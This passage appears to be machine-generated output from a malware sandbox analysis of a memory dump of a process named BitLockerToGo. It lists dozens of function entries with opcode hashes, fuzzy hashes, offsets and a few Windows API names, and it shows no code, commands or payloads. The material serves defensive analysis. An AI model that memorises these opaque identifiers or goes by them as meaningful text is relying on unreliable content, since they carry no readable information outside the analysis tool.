                                                                                                      • Opcode ID: fe8f223ee76603c3aece524465b618fdd825d3a2e2c1edf2e7f9cd4f1f55984b
                                                                                                      • Instruction ID: 91ea419b8e8878dcf4bf1d9f14c732df9cf384a50f20ceb6f50bc6beff210b3e
                                                                                                      • Opcode Fuzzy Hash: fe8f223ee76603c3aece524465b618fdd825d3a2e2c1edf2e7f9cd4f1f55984b
                                                                                                      • Instruction Fuzzy Hash: E1E16739200601EFCB60CF28D940A5ABBF2FF49314F15896DE98A87B61D335E861DF94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c5dc0ef1997e454bd653b5ed4eaa20efe33f714164dd0511d2672dd097057c19
                                                                                                      • Instruction ID: 517b95f5ec06c70c355f78d6eacf703e722f6c6c60221bcb7687b4aa50d7eafd
                                                                                                      • Opcode Fuzzy Hash: c5dc0ef1997e454bd653b5ed4eaa20efe33f714164dd0511d2672dd097057c19
                                                                                                      • Instruction Fuzzy Hash: 76C11A72D046918FDB118A7CCC813997F725B5B324F1D829AD591EB3C6C23E9807C766
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 009a5355264c9f14ecb0f62cc2bcf6d2004e29e9d86301fdb535bae800d9ed78
                                                                                                      • Instruction ID: ad45e24ab4404ff8fdf84920df79dc582d7af9452bb7bf922b09ff9a7c8b0726
                                                                                                      • Opcode Fuzzy Hash: 009a5355264c9f14ecb0f62cc2bcf6d2004e29e9d86301fdb535bae800d9ed78
                                                                                                      • Instruction Fuzzy Hash: 8BB10A71605B418FD728CA29C491673B7A2EB9A360F2C9B1FC4A7077E1D338E805D759
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b4c72a178822177bdc76ddbf559d413cc0f94f993183ea54337c62f4c7b5333a
                                                                                                      • Instruction ID: 72e2245301f4d2af7c84c42c2667884ed16cacc98422d8832845bc58708e572d
                                                                                                      • Opcode Fuzzy Hash: b4c72a178822177bdc76ddbf559d413cc0f94f993183ea54337c62f4c7b5333a
                                                                                                      • Instruction Fuzzy Hash: 96910175608320CBD310DF15E89166BB3F1FF92318F488A2DE8828B391E7799904C79A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7a5c88fdf9dd2f33cb9187e09471b4645a36a352796231c4fa4875e5e3c12cc6
                                                                                                      • Instruction ID: eb4ead81cadc44e824b053123b9260e907458008dd251996ef79c0274e8e1d03
                                                                                                      • Opcode Fuzzy Hash: 7a5c88fdf9dd2f33cb9187e09471b4645a36a352796231c4fa4875e5e3c12cc6
                                                                                                      • Instruction Fuzzy Hash: 6ED15675200A01EFC720CF28D940A56BBF2FF49304F158A69E99A87BA1D335F861CF95
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 545f7f25620c192ed7336170d717c3702c69ebe7d520aab218eefc7312849e83
                                                                                                      • Instruction ID: a03738f73058ad773912a693f305ac817239dd3456f644a8d954f124386223d0
                                                                                                      • Opcode Fuzzy Hash: 545f7f25620c192ed7336170d717c3702c69ebe7d520aab218eefc7312849e83
                                                                                                      • Instruction Fuzzy Hash: 87C1F371504F808BD7259B38C8997E6BBE1AB96314F084E7ED4EF87382E6396544C706
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78db7428fa6b2eca4413b80d9711960af8d5248a1818230923aad2606a263c73
                                                                                                      • Instruction ID: 2814f46951d14fb92cd75e7dd190c182d43a69d0ed71b3f13ca5f51d5eb94e41
                                                                                                      • Opcode Fuzzy Hash: 78db7428fa6b2eca4413b80d9711960af8d5248a1818230923aad2606a263c73
                                                                                                      • Instruction Fuzzy Hash: 03816576E04204DBEB048F28EC4277EB3B5FB4A315F24043EE556A7292D7B9E911C798
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 626cb85be01b892384b73e56115e1534aaf611bf577a34f57bd6c651bd9195a1
                                                                                                      • Instruction ID: d125b3214e1029221ed2a327c1f9e08b630aaf0373e3f7e445ddd9761c0b6739
                                                                                                      • Opcode Fuzzy Hash: 626cb85be01b892384b73e56115e1534aaf611bf577a34f57bd6c651bd9195a1
                                                                                                      • Instruction Fuzzy Hash: 04B1F571518B808BD7259F38C9453ABBBE1BB56314F188E6ED4EBC7382E638A444C716
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 903efb08ba3b27dd989098ab786d474e5dafe1e143fd0d58d0cbe43893fd5f23
                                                                                                      • Instruction ID: 3b4b5c29d67ca8fefd225186018e53eca5cb5e002260f47b1913eb841e57e588
                                                                                                      • Opcode Fuzzy Hash: 903efb08ba3b27dd989098ab786d474e5dafe1e143fd0d58d0cbe43893fd5f23
                                                                                                      • Instruction Fuzzy Hash: 13819EB4148B918AD332CF3AD4907E3BFE1AB57300F54885DC5EA0B386D7796405CBA6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 381517474ed3a248dbd1441593cb3572e920911bd124fa42d24af86f8ebd15dc
                                                                                                      • Instruction ID: 67e84f28e60f5619890b0f5433a5ef11e5c8b906f9a992e268be80ba5681a32a
                                                                                                      • Opcode Fuzzy Hash: 381517474ed3a248dbd1441593cb3572e920911bd124fa42d24af86f8ebd15dc
                                                                                                      • Instruction Fuzzy Hash: D391E472619B804FC324DB38C8853E7BBD26B96314F1C8A7DC5EAC73C6D678A0458715
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c5656dc9ce3b4377b1c94a894881be6a37c8a5f0dd79cd3e0d2b5eeaf624a896
                                                                                                      • Instruction ID: c5e5262b75383657fff1e00d5933f9845425142e4587076b4d992252f5e2c33b
                                                                                                      • Opcode Fuzzy Hash: c5656dc9ce3b4377b1c94a894881be6a37c8a5f0dd79cd3e0d2b5eeaf624a896
                                                                                                      • Instruction Fuzzy Hash: 3971F872B043106BF714AF69DC8676BB6D9DFD0B08F08453EF94593342E678ED04869A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2471502a362a509f65ab3c27ae654f5789f7769227e2af482ff326b530408fe8
                                                                                                      • Instruction ID: 8aaca1967abda618aeb069be913bac36ccb16ae437c22cc081fff5941df4eeee
                                                                                                      • Opcode Fuzzy Hash: 2471502a362a509f65ab3c27ae654f5789f7769227e2af482ff326b530408fe8
                                                                                                      • Instruction Fuzzy Hash: B0912472608B804BD3158A38C4943E7BFD2AFEA318F19897DC5EB47347D579A446C706
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 344bc2e207595128fb4e18ec7179ea163fa850e27879f8ddc177650b71fb659c
                                                                                                      • Instruction ID: 5c00d3aa2c9f8b2fd859af4c9a27dd41584c3821e5fc939f71e5e73ee3629ac7
                                                                                                      • Opcode Fuzzy Hash: 344bc2e207595128fb4e18ec7179ea163fa850e27879f8ddc177650b71fb659c
                                                                                                      • Instruction Fuzzy Hash: 4F911971518B808BD325DF38C9553AABFE2AB96314F088E6ED4EBC73C2D638D5058716
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 19e40ce72b48ee7998a01d69976d8991305629fe76aabfbadc0200f8b96b580c
                                                                                                      • Instruction ID: 9fc45b4438b6cdfef42a477fd7d1afab73eb167522d7d940dc8f5b75dba43d7f
                                                                                                      • Opcode Fuzzy Hash: 19e40ce72b48ee7998a01d69976d8991305629fe76aabfbadc0200f8b96b580c
                                                                                                      • Instruction Fuzzy Hash: 42515827B195926BC7194A3C1C512BA6A430B5B330F3ED37ADDB1CB3E4C61D8C0A5359
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b40d3bce74af9337768379dd9c5503dda08bd2bdfd3386cc8d6c810ae7dc15c6
                                                                                                      • Instruction ID: feacda48a00cbf52bca00e0442a3473f6ecee534d1a0838e995a402e0591ba01
                                                                                                      • Opcode Fuzzy Hash: b40d3bce74af9337768379dd9c5503dda08bd2bdfd3386cc8d6c810ae7dc15c6
                                                                                                      • Instruction Fuzzy Hash: 7951D376B046014BC71DCE2E99A163FB2D3ABC8310F59C13EE85A873C5EF74D8118685
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3f7095f3be19f1b171fe850a7de2409c0da854d50316742a3f1b9341337d5160
                                                                                                      • Instruction ID: 49a34299c779da669c45a7ca7bba6004e07c81acf6df836dff5b914666ea0943
                                                                                                      • Opcode Fuzzy Hash: 3f7095f3be19f1b171fe850a7de2409c0da854d50316742a3f1b9341337d5160
                                                                                                      • Instruction Fuzzy Hash: 2E515732A043108BD7108F29C88575BB7A5EFC9715F18993AE894A7362D378EC09879A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c7c4d34d28ff211429245c733027449bee1504e1121e4ff32258ba0558ded5d2
                                                                                                      • Instruction ID: e6612584a4d39b6c2588de873a670f356000ee2fc054c6dfd081cfa95e373b6b
                                                                                                      • Opcode Fuzzy Hash: c7c4d34d28ff211429245c733027449bee1504e1121e4ff32258ba0558ded5d2
                                                                                                      • Instruction Fuzzy Hash: 74619DB1A087548FE714DF29D49475BBBE1BB88308F044E2EE4D987391E779D6088F86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f2941a7b367f150150946be65622cc65c06d426a85559ebce3d8aed5128feb86
                                                                                                      • Instruction ID: e50d2dc8f3ec9ef24d498dace6064953d4300850802fea0cf98e63b4200b2c5a
                                                                                                      • Opcode Fuzzy Hash: f2941a7b367f150150946be65622cc65c06d426a85559ebce3d8aed5128feb86
                                                                                                      • Instruction Fuzzy Hash: 61516BB15087548FE714DF69D49435BBBE1BB88318F044A2EE4E987391E379DA088F86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bfdb8dd877c3c7a7d38cf03a7262899b66684a5b735e4deb688366cb823101f8
                                                                                                      • Instruction ID: 0955568d36c9b85c4c3f0cd02ac2a3af8c15efee8e33f8930422f4e0ef5d12f3
                                                                                                      • Opcode Fuzzy Hash: bfdb8dd877c3c7a7d38cf03a7262899b66684a5b735e4deb688366cb823101f8
                                                                                                      • Instruction Fuzzy Hash: 3B41C17094021187CB24DF18CCD2AB773B1EF65364F19521DE856AB3D1F378A940C7A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e81d02d21c632afa6be762cde65fceef2c8283075d10721c55edf9e642f617c1
                                                                                                      • Instruction ID: c3423fac2bd9d60a9134e16486bffbd40a0798329d78fcaf43687e666501da83
                                                                                                      • Opcode Fuzzy Hash: e81d02d21c632afa6be762cde65fceef2c8283075d10721c55edf9e642f617c1
                                                                                                      • Instruction Fuzzy Hash: EC5170B5A046009FC714DF18C88092BB7A1FF89328F15467DE895AB392D735EC51CF96
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 49b2cb179c961330f29ebbf84994d43743a4140769e7e11f77abc7e5bd91ed91
                                                                                                      • Instruction ID: c258609e37002d2745215e22ee6d6ac7cf512ded3ff052b142acfc862229733f
                                                                                                      • Opcode Fuzzy Hash: 49b2cb179c961330f29ebbf84994d43743a4140769e7e11f77abc7e5bd91ed91
                                                                                                      • Instruction Fuzzy Hash: 0F510F252093C1CFC719CF6C9884546BFA1AF7A200B4CCAEDD8859F747C664DA65CBE2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: c55a19ffa175d4d98c06b0ab6c6b0d4a3bf7635910573eb6678b2ba9ffd4f4da
                                                                                                      • Instruction ID: 8203e347efd36de3f3f860cb2be2a265d3cbf7796e78abf8cf9bee67c75a7ec2
                                                                                                      • Opcode Fuzzy Hash: c55a19ffa175d4d98c06b0ab6c6b0d4a3bf7635910573eb6678b2ba9ffd4f4da
                                                                                                      • Instruction Fuzzy Hash: 27319335B0C3518BD7088F25E850B3BB3A1FB96301FA8492ED59617691C3F9A9418B9E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                      • Instruction ID: 40e86927a3af7fd2e3f8e611723f4f22410bc1faaad8adacaecd0bbb6c4a9c23
                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                      • Instruction Fuzzy Hash: A711E973A051D40EC3168D3C8440666BFA30E97235F19539EF4F99B3D7D6268D8A8359
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6e73d309f17c4f5610788fd024001330fc394db5079930bb6b2034b153c3c746
                                                                                                      • Instruction ID: cd10bc1187b7e640fe99cc0bed52d3a692554ebd2a30f8d909857c9525da888d
                                                                                                      • Opcode Fuzzy Hash: 6e73d309f17c4f5610788fd024001330fc394db5079930bb6b2034b153c3c746
                                                                                                      • Instruction Fuzzy Hash: E001B1F6F00B1187EB20AF51A8C0727B2A96FA0708F69553EE8045B342DB79EC04C6DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 40fbeb571b3c3a24c261c1df8d3c698d460aa80eb860ad97b407245f63a19fb6
                                                                                                      • Instruction ID: 6c829fd32569455c6d938ddd5e4c229e0f7c57dc7edbacc6d5cfb3d661b02ee6
                                                                                                      • Opcode Fuzzy Hash: 40fbeb571b3c3a24c261c1df8d3c698d460aa80eb860ad97b407245f63a19fb6
                                                                                                      • Instruction Fuzzy Hash: EE1151357083509FD304DF19E890A2BB7E1FB56311F58987EE4899B262C379D840CB8A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearInit
                                                                                                      • String ID: !$($-$-$2$3$7$8$=$?$\
                                                                                                      • API String ID: 2610073882-1255047175
                                                                                                      • Opcode ID: 27c6920859c1b4e1365dfd269c59e12bf7e005718fd5d34dc652518209f776ea
                                                                                                      • Instruction ID: 452646070fd9e5458734a4f9e1c80f47e4d0169377dbdc21d069409c1d6dac9a
                                                                                                      • Opcode Fuzzy Hash: 27c6920859c1b4e1365dfd269c59e12bf7e005718fd5d34dc652518209f776ea
                                                                                                      • Instruction Fuzzy Hash: FD41247110C7C18ED326DB78844834AFFE16BA7324F084A9DE1E14B3D2D6B6814ACB53
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearInit
                                                                                                      • String ID: !$($-$-$2$3$7$8$=$?$\
                                                                                                      • API String ID: 2610073882-1255047175
                                                                                                      • Opcode ID: 554804a5a22c8d07e9cdda0f27d538de47f05e00fff8e4a7359c7b92d69d81ea
                                                                                                      • Instruction ID: d56681c75501bf97c69d588fc8ba144bfdee0fa4d1256071186a330235ff4b71
                                                                                                      • Opcode Fuzzy Hash: 554804a5a22c8d07e9cdda0f27d538de47f05e00fff8e4a7359c7b92d69d81ea
                                                                                                      • Instruction Fuzzy Hash: 4731F67050C7C18ED326DB68844834AFFE16BA7324F484A9DE1E04B3D6D6B6854ACB57
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocString
                                                                                                      • String ID: j$s$s$v$w$w$x$x${$|
                                                                                                      • API String ID: 2525500382-2172040885
                                                                                                      • Opcode ID: ae4465e89c76f942159bb34a80869e8b630cd38f3c16300723ed1775d9b7af9c
                                                                                                      • Instruction ID: 7e89aeaaf24b1ad5297ca33c5de522f916ae25b00a82c4446701d149346e0e2b
                                                                                                      • Opcode Fuzzy Hash: ae4465e89c76f942159bb34a80869e8b630cd38f3c16300723ed1775d9b7af9c
                                                                                                      • Instruction Fuzzy Hash: 5791D52150CBC289D336C63C88097DFAED15BA7224F088BADD1FA5A6E2D7790146D367
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitVariant
                                                                                                      • String ID: #$#$2$5$9
                                                                                                      • API String ID: 1927566239-987578143
                                                                                                      • Opcode ID: ba25f1ba800eb84554e514620c34945d49ec0cde08ef133b28ce732823e2babb
                                                                                                      • Instruction ID: cba3266f8aad4ec9e8e596bf17d17ae030c958599238294790c32e06474150da
                                                                                                      • Opcode Fuzzy Hash: ba25f1ba800eb84554e514620c34945d49ec0cde08ef133b28ce732823e2babb
                                                                                                      • Instruction Fuzzy Hash: 67414B7140C7C18ED3218B28889838FBFD16BDA328F594A5DE4E81B3D2C7B98505CB97
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitVariant
                                                                                                      • String ID: #$#$2$5$9
                                                                                                      • API String ID: 1927566239-987578143
                                                                                                      • Opcode ID: c039219e9a7082ced17bd6c7ec9eecb89d369b866f66a0a06d915f94000c61b5
                                                                                                      • Instruction ID: f5c49a9b1f49bf067b291b7b04fbd1eddaca4f273422725035fc13fe1b64ce1b
                                                                                                      • Opcode Fuzzy Hash: c039219e9a7082ced17bd6c7ec9eecb89d369b866f66a0a06d915f94000c61b5
                                                                                                      • Instruction Fuzzy Hash: C6412A7010C7C08ED3668B38889835EBFD15BAA328F585A9DF0E45B3E2C7798549C767
                                                                                                      APIs
                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041E164
                                                                                                      • IsWindowEnabled.USER32 ref: 0041E17B
                                                                                                      • IsWindowVisible.USER32 ref: 0041E190
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnabledProcessThreadVisible
                                                                                                      • String ID: 2A
                                                                                                      • API String ID: 2668887044-225269067
                                                                                                      • Opcode ID: 510cc9615e9c050fd1e7daeefa1bfe187d4e73a5770c4db4c7dddec49d02fa93
                                                                                                      • Instruction ID: 281257359348d559fb1ca2bd4625768fa95f333d4a8e38643a51b71ffb312810
                                                                                                      • Opcode Fuzzy Hash: 510cc9615e9c050fd1e7daeefa1bfe187d4e73a5770c4db4c7dddec49d02fa93
                                                                                                      • Instruction Fuzzy Hash: 5861D439608251CFC315CF29C85042EBBE1AFCA304F198ABDE8D5C7382D638E842CB46